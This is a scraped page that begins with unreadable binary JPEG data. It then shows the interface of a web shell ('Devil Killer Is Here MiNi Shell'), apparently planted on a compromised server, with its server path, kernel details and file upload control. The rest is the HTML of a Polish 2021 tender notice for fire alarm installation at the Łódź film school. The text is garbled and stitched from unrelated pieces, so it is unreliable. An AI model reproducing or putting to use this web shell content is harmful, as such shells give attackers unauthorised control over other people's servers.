JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210907/0017268401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Instalacja sygnalizacji pożaru SSP w wybranych budynkach PWSFTviT im. L. Schillera w Łodzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowa Wyższa Szkoła Filmowa Telewizyjnai Teatralna im. L. Schillera w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275850</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Targowa 61/63</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-323</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">426345841</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">426748139</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@filmschool.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.filmschool.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Instalacja sygnalizacji pożaru SSP w wybranych budynkach PWSFTviT im. L. Schillera w Łodzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2d72bcb4-0fc9-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00172684</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.filmschool.lodz.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal,<br/>https://filmschool.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymaganie techniczne i organizacyjne dot. korespondencji elektronicznej zostały określone na<br/>platformie e-Zamawiający</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 oraz art. 14 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Państwowa Wyższa Szkoła Filmowa,<br/>Telewizyjna i Teatralna im. L. Schillera w Łodzi, ul. Targowa 61/63, 90-323 Łódź.<br/>2) w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Iwona<br/>Polakowska , za pośrednictwem adresu e-mail: iod@filmschool.lodz.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie przedmiotowego zamówienia publicznego w związku zustawą Prawo zamówień publicznych oraz Kodeks Cywilny;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawy z dnia 11 września 2019r. – Prawo<br/>zamówień publicznych (Dz.U. 2019 poz. 2019 z późn. zm.), dalej „ustawa Pzp”,<br/>a także inne podmioty/osoby/organy w zakresie i na zasadach określonych przepisami prawa;<br/>5) Administrator przetwarza następujące kategorie danych: imię i nazwisko, dane teleadresowe,<br/>stanowisko służbowe, rodzaj umowy o pracę itp.;<br/>6) Administrator pozyskuje dane osobowe osób innych niż Wykonawca, od Wykonawcy, np.: dane<br/>osobowe pełnomocnika, osób zatrudnionych przez Wykonawcę lub Podwykonawcę na podstawie<br/>umowy o pracę wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji<br/>zamówienia, osób fizycznych skierowanych przez Wykonawcę do realizacji umowy itp.;<br/>7) dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5<br/>lat, albo 10 lat w przypadku zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia<br/>roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy. Okresy te<br/>dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze<br/>(nie zawarto z tymi Wykonawcami umowy).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP1/08/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest instalacja sygnalizacji pożaru SSP w budynkach „D”, „G”, „J”, „R”, „W”, i „Z”.<br/>2.	System sygnalizacji pożaru ma być zainstalowany w budynkach „D”, „G”, „J”, „R”, „W”, i „Z” znajdujących się na terenie PWSFTviT w Łodzi przy ulicy Targowej 61/63 oraz 57.<br/>3.	Zadanie ma na celu ujednolicenie systemów sygnalizacji pożaru na terenie PWSFTviT w Łodzi oraz zcentralizowanie monitorowania central CSP w portierni głównej<br/>4.	System ten ma być wykonany w oparciu o projekt wykonawczy instalacji sygnalizacji pożaru SSP z 04.2021 r.<br/>5.	W zakres zadania wchodzą następujące elementy:<br/>1)	wykonanie systemu SSP w wyznaczonych wyżej budynkach zgodnie z projektem wykonawczym,<br/>2)	sieciowanie central budynków (CSP2, CSP3 oraz CSP4) oraz podłączenie ich do centrali nadrzędnej CSP1 znajdującej się w portierni głównej,<br/>3)	zaprogramowanie central,<br/>4)	usunięcie istniejących systemów SSP w budynku „Z” oraz archiwum budynku „J”,<br/>5)	przeprowadzenie pomiarów i testów instalacji,<br/>6)	szkolenie pracowników PWSFTviT obsługującej centrale,<br/>7)	przekazanie dokumentacji powykonawczej.<br/>8)	konserwacja systemu przez okres gwarancyjny – konserwacje należy przeprowadzić raz <br/>w roku dla każdego elementu systemu<br/>6.	Przewody instalacji SSP na 2. piętrze w budynku „Z”, w budynku „W”, „R”, „G” , należy prowadzić pod tynkiem.<br/>7.	Instalacje w budynku „J” należy rozbudować w oparciu o istniejące linie według załączonego projektu.<br/>8.	Zadanie obejmuje wszystkie koszty związane z wykonaniem i zsieciowaniem instalacji.<br/>9.	Gwarancja: 24 miesiące od dnia odbioru końcowego na sprzęt i instalacje. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31625200-5 - Systemy przeciwpożarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska<br/>największą liczbę punktów w następujących kryteriach oceny ofert:<br/>„łączna cena ofertowa brutto” – C; „termin realizacji” – T.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają następujące warunki udziału w postępowaniu:<br/>1)	Zdolność do występowania w obrocie gospodarczym:<br/>Zamawiający odstępuje od stawiania warunku <br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający odstępuje od stawiania warunku <br/>3)	Sytuacja ekonomiczna lub finansowa:<br/>Zamawiający odstępuje od stawiania warunku <br/>4)	Zdolność techniczna lub zawodowa:<br/>W celu potwierdzenia przez Wykonawcę spełniania warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej Wykonawca zobowiązany jest wykazać, że:<br/>- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej: 2 instalacje o zakresie zbliżonym z przedmiotem zamówienia polegające na wykonaniu instalacji sygnalizacji pożaru SSP, o wartości robót brutto co najmniej 200 000,00 zł. (słownie: dwieście tysięcy złotych 00/100). <br/>- dysponuje osobami niezbędnymi do realizacji zamówienia:<br/>•	minimum 1 osobą wskazaną na stanowisko kierownika robót instalacyjnych w zakresie instalacji elektrycznych, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz 3-letnie doświadczenie w kierowaniu robotami budowlanymi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału<br/>w postępowaniu, Zamawiający zamiast podmiotowych środków dowodowych (określonych<br/>Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. 2020 poz. 2415), żąda<br/>oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 Pzp złożonym wraz z ofertą, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez Zamawiającego w niniejszej SWZ w Rozdziale 6.<br/>2) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie,<br/>o którym mowa w ppkt 1), składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	Podmiotowe środki dowodowe z zakresie potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>1)	Zdolność do występowania w obrocie gospodarczym<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności do występowania w obrocie gospodarczym, Zamawiający żąda:<br/>nie dotyczy<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Zamawiający żąda:<br/>nie dotyczy<br/>3)	Sytuacja ekonomiczna lub finansowa<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda:<br/>nie dotyczy<br/>4)	Zdolność techniczna lub zawodowa<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda:<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty;<br/>- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>7.	Przedmiotowe środki dowodowe w zakresie potwierdzenia zgodności oferowanych robót budowlanych z wymaganiami określonymi w opisie przedmiotu zamówienia.<br/>Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w niniejszym postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w niniejszym<br/>postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć:<br/>1) oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu, o którym mowa w art. 125 ust 1 Pzp. W przypadku wspólnego ubiegania się o<br/>zamówienie przez wykonawców, oświadczenie, o którym mowa w zdaniu pierwszym, składa<br/>każdy z wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu;<br/>2) w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania - odpis z Krajowego Rejestru Sądowego lub informacja z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w odniesieniu do<br/>Wykonawcy, Wykonawcy wspólnie ubiegającego się o zamówienie (jeżeli dotyczy), jak również<br/>w odniesieniu do podmiotów udostępniających zasoby (jeżeli dotyczy) oraz podwykonawców<br/>niebędących podmiotami udostępniającymi zasoby (jeżeli dotyczy), chyba że Zamawiający może<br/>je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów. W przypadku wskazania przez Wykonawcę<br/>dostępności ww. dokumentów, pod określonymi adresami internetowymi ogólnodostępnych ibezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia<br/>na język polski pobranych samodzielnie przez Zamawiającego dokumentów;<br/>3) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy lub podmiotu udostępniającego zasoby, chyba że umocowanie do reprezentacji<br/>wynika z dokumentów, o których mowa w pkt 2;<br/>4) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o<br/>współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>5) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że<br/>stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności: a) zakres dostępnych Wykonawcy<br/>zasobów podmiotu udostępniającego zasoby; b) sposób i okres udostępnienia Wykonawcy i<br/>wykorzystania przez Wykonawcę zasobów podmiotu udostępniającego zasoby przy<br/>wykonywaniu zamówienia; c) czy i w jakim zakresie podmiot udostępniający zasoby, na<br/>zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących kwalifikacji zawodowych lub doświadczenia zrealizuje usługi, których wskazane<br/>zdolności dotyczą; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości 6000,00 zł.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2019 poz. 310 ze zm.)<br/>5.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Milenium nr rachunku 79 1160 2202 0000 0002 4705 0622 z dopiskiem na przelewie: „Instalacja sygnalizacji pożaru SSP w wybranych budynkach PWSFTviT im. L. Schillera w Łodzi”.<br/>6.	Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 4 ppkt 2-4 powyżej, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania 